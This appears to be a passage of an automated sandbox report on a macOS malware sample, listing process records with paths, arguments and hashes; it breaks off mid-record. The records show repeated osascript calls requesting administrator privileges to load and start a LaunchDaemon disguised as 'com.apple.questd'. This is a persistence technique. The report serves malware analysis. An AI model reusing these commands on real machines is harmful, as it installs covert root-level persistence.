Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: sh PID: 653 Parent PID: 652

General

Start time:	19:14:55
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 654 Parent PID: 653

General

Start time:	19:14:55
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 654 Parent PID: 653

General

Start time:	19:14:55
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 655 Parent PID: 653

General

Start time:	19:14:55
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 655 Parent PID: 653

General

Start time:	19:14:55
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl start questd
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 656 Parent PID: 639

General

Start time:	19:14:55
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: osascript PID: 656 Parent PID: 639

General

Start time:	19:14:55
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: osascript PID: 657 Parent PID: 656

General

Start time:	19:14:55
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	n/a
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: security_authtrampoline PID: 657 Parent PID: 656

General

Start time:	19:14:55
Start date:	07/06/2021
Path:	/usr/libexec/security_authtrampoline
Arguments:	/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	19120 bytes
MD5 hash:	1f0524c40489885f3c9320bace20f852

Analysis Process: uid PID: 657 Parent PID: 656

General

Start time:	19:14:55
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: uid PID: 657 Parent PID: 656

General

Start time:	19:14:55
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: sh PID: 657 Parent PID: 656

General

Start time:	19:14:55
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 658 Parent PID: 657

General

Start time:	19:14:55
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 658 Parent PID: 657

General

Start time:	19:14:55
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 659 Parent PID: 657

General

Start time:	19:14:56
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 659 Parent PID: 657

General

Start time:	19:14:56
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl start questd
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 672 Parent PID: 639

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: osascript PID: 672 Parent PID: 639

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: osascript PID: 674 Parent PID: 672

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	n/a
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: security_authtrampoline PID: 674 Parent PID: 672

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/usr/libexec/security_authtrampoline
Arguments:	/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	19120 bytes
MD5 hash:	1f0524c40489885f3c9320bace20f852

Analysis Process: uid PID: 674 Parent PID: 672

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: uid PID: 674 Parent PID: 672

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: sh PID: 674 Parent PID: 672

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 675 Parent PID: 674

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 675 Parent PID: 674

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 676 Parent PID: 674

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 676 Parent PID: 674

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl start questd
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 680 Parent PID: 639

General

Start time:	19:15:00
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: osascript PID: 680 Parent PID: 639

General

Start time:	19:15:00
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: osascript PID: 681 Parent PID: 680

General

Start time:	19:15:00
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	n/a
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: security_authtrampoline PID: 681 Parent PID: 680

General

Start time:	19:15:00
Start date:	07/06/2021
Path:	/usr/libexec/security_authtrampoline
Arguments:	/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	19120 bytes
MD5 hash:	1f0524c40489885f3c9320bace20f852

Analysis Process: uid PID: 681 Parent PID: 680

General

Start time:	19:15:00
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: uid PID: 681 Parent PID: 680

General

Start time:	19:15:00
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: sh PID: 681 Parent PID: 680

General

Start time:	19:15:00
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 682 Parent PID: 681

General

Start time:	19:15:00
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 682 Parent PID: 681

General

Start time:	19:15:00
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 683 Parent PID: 681

General

Start time:	19:15:00
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 683 Parent PID: 681

General

Start time:	19:15:00
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl start questd
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 684 Parent PID: 639

General

Start time:	19:15:00
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: osascript PID: 684 Parent PID: 639

General

Start time:	19:15:00
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: osascript PID: 685 Parent PID: 684

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	n/a
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: security_authtrampoline PID: 685 Parent PID: 684

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/usr/libexec/security_authtrampoline
Arguments:	/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	19120 bytes
MD5 hash:	1f0524c40489885f3c9320bace20f852

Analysis Process: uid PID: 685 Parent PID: 684

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: uid PID: 685 Parent PID: 684

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: sh PID: 685 Parent PID: 684

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 686 Parent PID: 685

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 686 Parent PID: 685

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 687 Parent PID: 685

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 687 Parent PID: 685

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl start questd
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 688 Parent PID: 639

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: osascript PID: 688 Parent PID: 639

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: osascript PID: 689 Parent PID: 688

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	n/a
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: security_authtrampoline PID: 689 Parent PID: 688

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/usr/libexec/security_authtrampoline
Arguments:	/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	19120 bytes
MD5 hash:	1f0524c40489885f3c9320bace20f852

Analysis Process: uid PID: 689 Parent PID: 688

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: uid PID: 689 Parent PID: 688

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: sh PID: 689 Parent PID: 688

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 690 Parent PID: 689

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 690 Parent PID: 689

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 691 Parent PID: 689

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 691 Parent PID: 689

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl start questd
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 692 Parent PID: 639

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: osascript PID: 692 Parent PID: 639

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: osascript PID: 693 Parent PID: 692

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	n/a
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: security_authtrampoline PID: 693 Parent PID: 692

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/usr/libexec/security_authtrampoline
Arguments:	/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	19120 bytes
MD5 hash:	1f0524c40489885f3c9320bace20f852

Analysis Process: uid PID: 693 Parent PID: 692

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: uid PID: 693 Parent PID: 692

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: sh PID: 693 Parent PID: 692

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 694 Parent PID: 693

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 694 Parent PID: 693

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 695 Parent PID: 693

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 695 Parent PID: 693

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl start questd
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 696 Parent PID: 639

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: osascript PID: 696 Parent PID: 639

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: osascript PID: 697 Parent PID: 696

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	n/a
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: security_authtrampoline PID: 697 Parent PID: 696

General

Start time:	19:15:01
Start date:	07/06/2021
Path:	/usr/libexec/security_authtrampoline
Arguments:	/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	19120 bytes
MD5 hash:	1f0524c40489885f3c9320bace20f852

Analysis Process: uid PID: 697 Parent PID: 696

General

Start time:	19:15:02
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: uid PID: 697 Parent PID: 696

General

Start time:	19:15:02
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: sh PID: 697 Parent PID: 696

General

Start time:	19:15:02
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 698 Parent PID: 697

General

Start time:	19:15:02
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 698 Parent PID: 697

General

Start time:	19:15:02
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 699 Parent PID: 697

General

Start time:	19:15:02
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 699 Parent PID: 697

General

Start time:	19:15:02
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl start questd
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 723 Parent PID: 639

General

Start time:	19:16:06
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: osascript PID: 723 Parent PID: 639

General

Start time:	19:16:06
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: osascript PID: 724 Parent PID: 723

General

Start time:	19:16:06
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	n/a
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: security_authtrampoline PID: 724 Parent PID: 723

General

Start time:	19:16:06
Start date:	07/06/2021
Path:	/usr/libexec/security_authtrampoline
Arguments:	/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	19120 bytes
MD5 hash:	1f0524c40489885f3c9320bace20f852

Analysis Process: uid PID: 724 Parent PID: 723

General

Start time:	19:16:06
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: uid PID: 724 Parent PID: 723

General

Start time:	19:16:06
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: sh PID: 724 Parent PID: 723

General

Start time:	19:16:06
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 725 Parent PID: 724

General

Start time:	19:16:06
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 725 Parent PID: 724

General

Start time:	19:16:06
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 726 Parent PID: 724

General

Start time:	19:16:06
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 726 Parent PID: 724

General

Start time:	19:16:06
Start date:	07/06/2021
Path:	/bin/launchctl
